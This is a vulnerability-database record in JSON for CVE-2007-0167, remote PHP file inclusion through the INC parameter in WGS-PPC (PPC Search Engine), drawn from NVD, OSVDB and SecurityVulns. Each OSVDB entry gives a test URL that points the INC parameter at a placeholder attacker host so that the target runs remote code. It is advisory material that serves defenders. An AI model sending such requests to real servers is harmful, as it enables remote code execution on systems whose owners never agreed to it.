{"cve": [{"lastseen": "2020-10-03T11:45:48", "description": "Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine), as distributed with other aliases, allow remote attackers to execute arbitrary PHP code via a URL in the INC parameter in (1) config_admin.php, (2) config_main.php, (3) config_member.php, and (4) mysql_config.php in config/; (5) admin.php and (6) index.php in admini/; (7) paypalipn/ipnprocess.php; (8) index.php and (9) registration.php in members/; and (10) ppcbannerclick.php and (11) ppcclick.php in main/.", "edition": 3, "cvss3": {}, "published": "2007-01-10T01:28:00", "title": "CVE-2007-0167", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0167"], "modified": "2018-10-16T16:31:00", "cpe": ["cpe:/a:ppc_search_engine:ppc_search_engine:1.61", "cpe:/a:wgs-ppc:wgs-ppc:*"], "id": "CVE-2007-0167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0167", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wgs-ppc:wgs-ppc:*:*:*:*:*:*:*:*", "cpe:2.3:a:ppc_search_engine:ppc_search_engine:1.61:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. 
The issue is due to the config/config_main.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_main.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_main.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": 
"2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33445", "id": "OSVDB:33445", "title": "WGS-PPC (PPC Search Engine) config/config_main.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the paypalipn/ipnprocess.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the paypalipn/ipnprocess.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/paypalipn/ipnprocess.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33450", "id": "OSVDB:33450", "title": "WGS-PPC (PPC Search Engine) paypalipn/ipnprocess.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the members/registration.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the members/registration.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/members/registration.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33452", "id": 
"OSVDB:33452", "title": "WGS-PPC (PPC Search Engine) members/registration.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcbannerclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcbannerclick.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/main/ppcbannerclick.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33453", "id": "OSVDB:33453", "title": "WGS-PPC (PPC Search Engine) main/ppcbannerclick.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcclick.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/main/ppcclick.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33454", "id": "OSVDB:33454", "title": 
"WGS-PPC (PPC Search Engine) main/ppcclick.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/mysql_config.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/mysql_config.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/mysql_config.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33447", "id": "OSVDB:33447", "title": "WGS-PPC (PPC Search Engine) config/mysql_config.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/index.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/index.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/admini/index.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33449", "id": "OSVDB:33449", "title": 
"WGS-PPC (PPC Search Engine) admini/index.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_admin.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_admin.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33444", "id": "OSVDB:33444", "title": "WGS-PPC (PPC Search Engine) config/config_admin.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_member.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_member.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_member.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33446", "id": 
"OSVDB:33446", "title": "WGS-PPC (PPC Search Engine) config/config_member.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/admini/admin.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33448", "id": "OSVDB:33448", "title": "WGS-PPC (PPC Search Engine) admini/admin.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-0159", "CVE-2007-0192", "CVE-2007-0154", "CVE-2007-0181", "CVE-2007-0143", "CVE-2007-0176", "CVE-2007-0189", "CVE-2007-0182", "CVE-2007-0149", "CVE-2007-0167", "CVE-2007-0156", "CVE-2007-0205", "CVE-2007-0151", "CVE-2007-0191", "CVE-2007-0155", "CVE-2007-0150", "CVE-2007-0112", "CVE-2007-0194", 
"CVE-2007-0153", "CVE-2007-0202"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2007-01-09T00:00:00", "published": "2007-01-09T00:00:00", "id": "SECURITYVULNS:VULN:7020", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7020", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}